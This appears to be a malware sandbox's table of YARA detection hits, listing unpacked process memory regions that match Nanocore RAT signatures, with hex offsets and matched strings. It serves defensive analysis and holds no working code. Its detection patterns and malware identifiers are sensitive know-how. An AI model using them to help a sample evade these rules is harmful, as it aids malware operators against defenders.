12.3.mmuiqlcvwo.pif.3c4d828.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.mmuiqlcvwo.pif.3c4d828.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.3.mmuiqlcvwo.pif.3c4d828.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3c4d828.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.RegSvcs.exe.ae0000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
6.2.RegSvcs.exe.ae0000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
6.2.RegSvcs.exe.ae0000.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.26b4de0.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.RegSvcs.exe.26b4de0.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
6.2.RegSvcs.exe.34ab46e.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d657:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d684:$x2: IClientNetworkHost
6.2.RegSvcs.exe.34ab46e.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d657:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e732:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d671:$s5: IClientLoggingHost
6.2.RegSvcs.exe.34ab46e.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegSvcs.exe.34ab46e.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x1de4b:$a: NanoCore 0x2d60d:$a: NanoCore 0x2d622:$a: NanoCore 0x2d657:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d3c9:$b: ClientPlugin
5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.3.mmuiqlcvwo.pif.3be7c18.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.mmuiqlcvwo.pif.3be7c18.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.3.mmuiqlcvwo.pif.3be7c18.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3be7c18.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.RegSvcs.exe.36e02a4.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28821:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x2884e:$x2: IClientNetworkHost
13.2.RegSvcs.exe.36e02a4.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28821:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x298fc:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x2883b:$s5: IClientLoggingHost
13.2.RegSvcs.exe.36e02a4.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.3.mmuiqlcvwo.pif.39f7c18.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.39f7c18.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.39f7c18.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.39f7c18.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.RegSvcs.exe.340000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.RegSvcs.exe.340000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.RegSvcs.exe.340000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegSvcs.exe.340000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.RegSvcs.exe.34b02a4.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
6.2.RegSvcs.exe.34b02a4.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
6.2.RegSvcs.exe.34b02a4.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegSvcs.exe.34b02a4.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28821:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x2884e:$x2: IClientNetworkHost
6.2.RegSvcs.exe.34b02a4.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28821:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x298fc:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x2883b:$s5: IClientLoggingHost
6.2.RegSvcs.exe.34b02a4.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.RegSvcs.exe.36db46e.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d657:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d684:$x2: IClientNetworkHost
13.2.RegSvcs.exe.36db46e.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d657:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e732:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d671:$s5: IClientLoggingHost
13.2.RegSvcs.exe.36db46e.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.36db46e.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x1de4b:$a: NanoCore 0x2d60d:$a: NanoCore 0x2d622:$a: NanoCore 0x2d657:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d3c9:$b: ClientPlugin
12.3.mmuiqlcvwo.pif.3c4d828.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.mmuiqlcvwo.pif.3c4d828.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.3.mmuiqlcvwo.pif.3c4d828.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3c4d828.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.RegSvcs.exe.36e48cd.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x241f8:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x24225:$x2: IClientNetworkHost
13.2.RegSvcs.exe.36e48cd.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x241f8:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x252d3:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x24212:$s5: IClientLoggingHost
13.2.RegSvcs.exe.36e48cd.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3be7c18.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.mmuiqlcvwo.pif.3be7c18.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.3.mmuiqlcvwo.pif.3be7c18.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3be7c18.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.3.mmuiqlcvwo.pif.3933240.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.3933240.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.3933240.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.3933240.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.3.mmuiqlcvwo.pif.39f7c18.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.39f7c18.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.39f7c18.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.39f7c18.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.RegSvcs.exe.2d0000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.RegSvcs.exe.2d0000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.2.RegSvcs.exe.2d0000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
